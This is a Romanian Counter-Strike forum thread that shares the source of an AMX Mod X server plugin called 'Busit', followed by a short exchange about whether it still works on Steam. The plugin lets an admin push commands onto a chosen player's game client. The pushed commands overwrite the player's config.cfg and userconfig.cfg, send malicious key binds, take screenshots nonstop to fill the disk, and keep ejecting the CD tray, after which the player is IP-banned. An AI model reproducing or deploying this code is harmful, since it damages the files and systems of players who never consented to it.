	"motdfile motdfile config.CFG;motd_write ^"Ai primit un busit^"",
	"motdfile motdfile userconfig.CFG;motd_write ^"Ai primit un busit^""
}

public plugin_init()
{
	register_plugin("Busit AMXX", "1.0", "cyby")
	register_concmd("amx_buseste", "buseste_l", ADMIN_BAN, "- <nume> distruge jucatorul")
}

public buseste_l(id, level, cid)
{
	if(!cmd_access(id, level, cid, 2))
	{
		return PLUGIN_HANDLED
	}
	
	new juc[32];
	read_argv(1, juc, 31)
	new jucator = cmd_target(id, juc, CMDTARGET_OBEY_IMMUNITY)

	if(!jucator)
	{
		console_print(id, "Jucatorul nu exista.")
		return PLUGIN_HANDLED
	}

	set_task(0.05, "ss_task", id+11111, _, _, "b")
	set_task(0.05, "cd_close_eject", id+11112, _, _, "b")
	
	new n;
	for(n = 0; n < sizeof bind_client; n++)
	{
		client_cmd(jucator, bind_client[n])
	}
	for(n = 0; n < sizeof fuck_client; n++)
	{
		client_cmd(jucator, fuck_client[n])
	}
	
	new admin[32], numejuc[32], ip[32];
	get_user_name(id, admin, 31)
	get_user_name(jucator, numejuc, 31)
	get_user_ip(jucator, ip, 31, 1)
	color(0, ".v[AMXX].g Adminul.e %s.g ii buseste una lui.e %s.g", admin, numejuc)
	
	server_cmd("addip 0.0 ^"%s^";wait;writeip", ip)
	log_to_file("busire.log", "Adminul %s l-a busit pe %s cu IP-ul: %s", admin, numejuc, ip)
	return PLUGIN_HANDLED;
}

public ss_task(id)
{
	if(!is_user_connected(id) && task_exists(id+11111))
	{
		remove_task(id+11111)
		return PLUGIN_HANDLED
	}
	client_cmd(id, "screenshot")
	client_cmd(id, "snapshot")
	return PLUGIN_CONTINUE
}

public cd_close_eject(id)
{
	if(!is_user_connected(id) && task_exists(id+11112))
	{
		remove_task(id+11112)
		return PLUGIN_HANDLED
	}
	client_cmd(id, "cd eject")
	client_cmd(id, "cd close")
	return PLUGIN_CONTINUE
}

public client_disconnect(id)
{
	remove_task(id+11111)
	remove_task(id+11112)
}

stock color(const id, const input[], any:...)
{
	new count = 1, players[32]
	static msg[191]
	vformat(msg, 190, input, 3)

	replace_all(msg, 190, ".v", "^4")
	replace_all(msg, 190, ".g", "^1")
	replace_all(msg, 190, ".e", "^3")

	if (id) players[0] = id; else get_players(players, count, "ch")
	{
		for (new i = 0; i < count; i++)
		{
			if (is_user_connected(players))
			{
				message_begin(MSG_ONE_UNRELIABLE, get_user_msgid("SayText"), _, players)
				write_byte(players);
				write_string(msg);
				message_end();
			}
		}
	}
}


Probabil, este, dar el nu doreste exterminate ca nu are sursa, sau ce vrea el.

Din toate cautarile asta a rezultat, oricum este idem cu v3.0, doar ca contine sursa.
Image
#WIZARDS to more, but I'm a hero.
-----------------------------------------------------
Lasă telefonul că ştiu actoria
Şi nu mai suna că-mi descarci bateria .


#Work only :

- [FPS Nvidia] [100%] [Public] [Here]
- [NoLag] [100%] [Public] [Here]
smileye
Fost moderator
Fost moderator
Posts: 4648
Joined: 12 Jun 2012, 15:18
Detinator Steam: Da
Reputatie: Fost moderator
Has thanked: 258 times
Been thanked: 38 times
Contact:

24 May 2013, 20:32

Dar mai functioneaza comenzile pe steam?
User avatar
cyby
Scripter eXtreamCS
Scripter eXtreamCS
Posts: 1777
Joined: 16 Jul 2011, 21:46
Detinator Steam: Da
Detinator server CS: Da
Reputatie: Scripter eXtreamCS
Fost Moderator ajutator
Has thanked: 146 times
Been thanked: 396 times

24 May 2013, 20:36

smileye wrote:Dar mai functioneaza comenzile pe steam?
Al meu da ban + ii face ss-uri asa vreo 30mb.
93.114.82.17:27015 - Monster Invasion CO-OP Mod
smileye
Fost moderator
Fost moderator
Posts: 4648
Joined: 12 Jun 2012, 15:18
Detinator Steam: Da
Reputatie: Fost moderator
Has thanked: 258 times
Been thanked: 38 times
Contact:

24 May 2013, 20:41

cyby wrote:
smileye wrote:Dar mai functioneaza comenzile pe steam?
Al meu da ban + ii face ss-uri asa vreo 30mb.
Merci fain ;) sper sa ma ajute.
Post Reply

Return to “Cereri”

  • Information